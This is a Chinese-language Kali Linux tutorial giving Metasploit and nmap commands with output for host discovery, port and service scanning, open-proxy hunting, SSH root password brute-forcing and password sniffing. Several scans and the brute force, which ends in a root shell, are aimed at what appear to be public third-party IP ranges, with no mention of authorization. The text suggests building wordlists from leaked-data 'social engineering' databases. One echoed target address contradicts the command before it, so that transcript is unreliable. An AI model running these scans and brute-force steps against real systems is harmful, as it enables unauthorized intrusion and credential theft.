Kali中msf下的主机探测与端口扫描实战

一.ICMP

msf > ping -c  5  www.qq.com

//因特网报探测器。测试网络连接

whatweb :命令

root@kali:~# whatweb  www.mrliangqi.com
/usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36:in `require': iconv will be deprecated in the future, use String#encode instead.
http://www.mrliangqi.com [200] Adobe-Flash, Country[CHINA][CN], Email[geoff@deconcept.com], HTML5, HTTPServer[nginx], IP[121.42.27.192], JQuery[3.0], PHP[5.3.27], Script[text/javascript], Title[%E6%8E%A7%E4%BC%81%E9%B9%85%E7%9A%84'Bolg| %E5%85%B3%E6%B3%A8%E4%BA%92%E8%81%94%E7%BD%91 | %E5%85%B3%E6%B3%A8%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8], UncommonHeaders[x-pingback], WordPress, X-Powered-By[PHP/5.3.27], X-UA-Compatible[IE=10], nginx, x-pingback[http://www.mrliangqi.com/xmlrpc.php]

MSF主机发现模块

msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   INTERFACE                   no        The name of the interface

   RHOSTS                      yes       The target address range or CIDR identifier

   SHOST                       no        Source IP Address

   SMAC                        no        Source MAC Address

   THREADS    1                yes       The number of concurrent threads

   TIMEOUT    5                yes       The number of seconds to wait for new data

msf auxiliary(arp_sweep) > set  RHOSTS 192.168.1.1/24

RHOSTS => 192.168.1.1/24

msf auxiliary(arp_sweep) > set ThREADS 50

ThREADS => 50

msf auxiliary(arp_sweep) > run

[*] 192.168.1.1 appears to be up (UNKNOWN).

[*] 192.168.1.10 appears to be up (UNKNOWN).

[*] 192.168.1.15 appears to be up (Wistron Neweb Corp.).

[*] Scanned 256 of 256 hosts (100% complete)

[*] Auxiliary module execution completed

二.远程主机扫描使用NMAP

 nmap  -sn 192.168.1.0/24

//活跃主机探测

nmap   -PU -sn 192.168.1.0/24
//UDP ping进行主机探测

nmap -O 192.168.1.1

//探测目标主机操作系统版本

nmap -sS -Pn  ip

//基本的端口扫描功能

nmap -sV -Pn ip

//列出服务详细信息

常用参数:

-sT :tcp扫描类似MSF中的tcp模块

-sS :tcp syn扫描类似MSF中syn

-Pn :在扫描前不发送ICMP echo请求来测试目标是否活跃。

-O  :启动tcp/ip协议栈的指纹扫描来获取远程主机的操作系统类型等信息。

-F  :快速扫描,只扫在NMAP-SERVERS中列出的端口。

-p  :端口范围。
三.端口扫描与服务类探测
--------------端口扫描----------

   auxiliary/scanner/http/wordpress_pingback_access                   normal  WordPress Pingback Locator
   auxiliary/scanner/natpmp/natpmp_portscan                           normal  NAT-PMP External Port Scanner

   auxiliary/scanner/portscan/ack                                     normal  TCP ACK Firewall Scanner

   auxiliary/scanner/portscan/ftpbounce                               normal  FTP Bounce Port Scanner

   auxiliary/scanner/portscan/syn                                     normal  TCP SYN Port Scanner

   auxiliary/scanner/portscan/tcp                                     normal  TCP Port Scanner

   auxiliary/scanner/portscan/xmas                                    normal  TCP "XMas" Port Scanner

   auxiliary/scanner/sap/sap_router_portscanner                       normal  SAPRouter Port Scanner

一般建议syn(使用发生TCP SYN标志的方式探测开放的端口)扫描,因为他速度快结果准确不容易被察觉。

msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > set rhosts  192.168.1.1

rhosts => 192.168.1.1

msf auxiliary(syn) > set threads  20

threads => 20

msf auxiliary(syn) > run

[*]  TCP OPEN 192.168.1.1:80

---------服务扫描与查点-------

msf auxiliary(syn) > search   name:_version

//查看所有的服务查点模块

常见的网络服务扫描

1.telnet服务扫描

msf auxiliary(syn) > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > set rhosts  192.168.1.15

rhosts => 192.168.1.15

msf auxiliary(telnet_version) > run

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

2.ssh服务扫描与查点

msf auxiliary(telnet_version) > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set rhosts 183.62.232.207

rhosts => 183.62.232.207

msf auxiliary(ssh_version) > set threads  100

threads => 100

msf auxiliary(ssh_version) > run

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

3.oracle服务查点模块

msf auxiliary(ssh_version) > use auxiliary/scanner/oracle/tnslsnr_version
msf auxiliary(tnslsnr_version) > set threads  50

threads => 50

msf auxiliary(tnslsnr_version) > set rhosts  203.175.156.0/24

rhosts => 203.175.156.0/24

msf auxiliary(tnslsnr_version) > run

[*] Scanned 035 of 256 hosts (013% complete)

[*] Scanned 097 of 256 hosts (037% complete)

[*] Scanned 100 of 256 hosts (039% complete)

[*] Scanned 141 of 256 hosts (055% complete)

[*] Scanned 150 of 256 hosts (058% complete)

[*] Scanned 174 of 256 hosts (067% complete)

[*] Scanned 198 of 256 hosts (077% complete)

[*] Scanned 250 of 256 hosts (097% complete)

[*] Scanned 255 of 256 hosts (099% complete)

[*] Scanned 256 of 256 hosts (100% complete)

[*] Auxiliary module execution completed

4.开放代理探测与利用

msf auxiliary(tnslsnr_version) > use auxiliary/scanner/http/open_proxy
msf auxiliary(open_proxy) > set site  www.baidu.com

site => www.baidu.com

msf auxiliary(open_proxy) > set rhosts 24.25.24.1-24.25.26.254
rhosts => 24.25.24.1-24.25.26.254

msf auxiliary(open_proxy) > set multiports true

multiports => true

msf auxiliary(open_proxy) > set verify_connect true

verify_connect => true

msf auxiliary(open_proxy) > set threads 100

threads => 100

msf auxiliary(open_proxy) > run

[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS.

四.口令猜测与嗅探

1.ssh服务口令猜测

前提:强大的词典是关键,最好结合社工库有针对性的最好。

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.1.1

rhosts => 183.62.232.207

msf auxiliary(ssh_login) > set username  root

username => root

msf auxiliary(ssh_login) > set pass_file /words.txt

pass_file => /words.txt

msf auxiliary(ssh_login) > set threads  50

threads => 50

msf auxiliary(ssh_login) > run

[*] 183.62.232.207:22 SSH - Starting bruteforce

[+] 183.62.232.207:22 SSH - Success: 'root:password' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh Linux localhost.localdomain 2.6.18-194.el5xen #1 SMP Tue Mar 16 22:01:26 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux '

[*] Command shell session 1 opened (192.168.1.17:59831 -> 183.62.232.207:22) at 2014-12-11 23:44:55 +0800

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

2.psnuffle口令嗅探

msf auxiliary(ssh_login) > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > run

[*] Auxiliary module execution completed

msf auxiliary(psnuffle) >

[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...

[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...

[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...

[*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...

[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...

[*] Sniffing traffic.....

注意:在渗透过程中,只有在接入对方的网络点之后,才能使用MSF的psnuffle进行口令嗅探。

发表评论

登录 后发表评论.